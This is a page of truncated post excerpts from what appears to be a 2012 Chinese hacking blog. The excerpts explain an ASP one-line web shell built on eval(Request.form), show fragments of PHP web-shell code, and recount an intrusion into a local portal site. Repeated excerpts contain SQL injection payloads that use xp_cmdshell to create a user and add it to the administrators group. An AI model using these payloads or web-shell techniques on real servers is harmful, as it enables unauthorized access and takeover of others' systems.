上一页 1 ··· 126 127 128 129 130 131 132 133 134 ··· 136 下一页
来解释下它的原理.首 先是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行, 后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了 Request.form('#')+''这句代码... Read More
posted @ 2012-07-15 21:04 adodo1 Views(87) Comments(0) Diggs(0) Edit
//接着前面的// 备份数据库function sqldumptable($table, $fp=0) {$tabledump = "DROP TABLE IF EXISTS $table;\n";$tabledump .= "CREATE TABLE $table (\n";$first... Read More
posted @ 2012-07-15 21:03 adodo1 Views(162) Comments(0) Diggs(0) Edit
//接着前面的// 备份数据库function sqldumptable($table, $fp=0) {$tabledump = "DROP TABLE IF EXISTS $table;\n";$tabledump .= "CREATE TABLE $table (\n";$first... Read More
posted @ 2012-07-15 21:03 adodo1 Views(96) Comments(0) Diggs(0) Edit
在ASP中,FSO的意思是File System Object,即文件系统对象。我们将要操纵的计算机文件系统,在这里是指位于web服务器之上。所以,确认你对此拥有合适的权限。理想情况下,你可以在自己的机器上建立一个web服务 器,这样就能方便地进行测试。如果运行于Windows平台,请试一试微软公司... Read More
posted @ 2012-07-15 21:02 adodo1 Views(149) Comments(0) Diggs(0) Edit
/*======================================================函数库======================================================*/// 登陆入口function loginpage() {?>Pass... Read More
posted @ 2012-07-15 21:02 adodo1 Views(101) Comments(0) Diggs(0) Edit
在ASP中,FSO的意思是File System Object,即文件系统对象。我们将要操纵的计算机文件系统,在这里是指位于web服务器之上。所以,确认你对此拥有合适的权限。理想情况下,你可以在自己的机器上建立一个web服务 器,这样就能方便地进行测试。如果运行于Windows平台,请试一试微软公司... Read More
posted @ 2012-07-15 21:02 adodo1 Views(140) Comments(0) Diggs(0) Edit
/*======================================================函数库======================================================*/// 登陆入口function loginpage() {?>Pass... Read More
posted @ 2012-07-15 21:02 adodo1 Views(201) Comments(0) Diggs(0) Edit
exec master..xp_cmdshell "net user name password /add"--;exec master..xp_cmdshell "net localgroup administrators name /add"--程序代码开启cmdshell的SQL语句EXEC ... Read More
posted @ 2012-07-15 21:01 adodo1 Views(186) Comments(0) Diggs(0) Edit
exec master..xp_cmdshell "net user name password /add"--;exec master..xp_cmdshell "net localgroup administrators name /add"--程序代码开启cmdshell的SQL语句EXEC ... Read More
posted @ 2012-07-15 21:01 adodo1 Views(127) Comments(0) Diggs(0) Edit
还记得以前我利用小榕哥的WED+WIS入侵本地信息港的那篇文章吗?自从上次入侵之后,网站的管理员想尽了办法堵住了所有SQL注入漏洞,想通过SQL 注入后台管理页面已经没有可能了。真是郁闷,但是转念一想,这正是一个练习技术的好机会,难道除了简单的工具利用外,我就没有其它的办法了吗?一定要想法 子再次拿... Read More
posted @ 2012-07-15 21:00 adodo1 Views(264) Comments(0) Diggs(0) Edit
上一页 1 ··· 126 127 128 129 130 131 132 133 134 ··· 136 下一页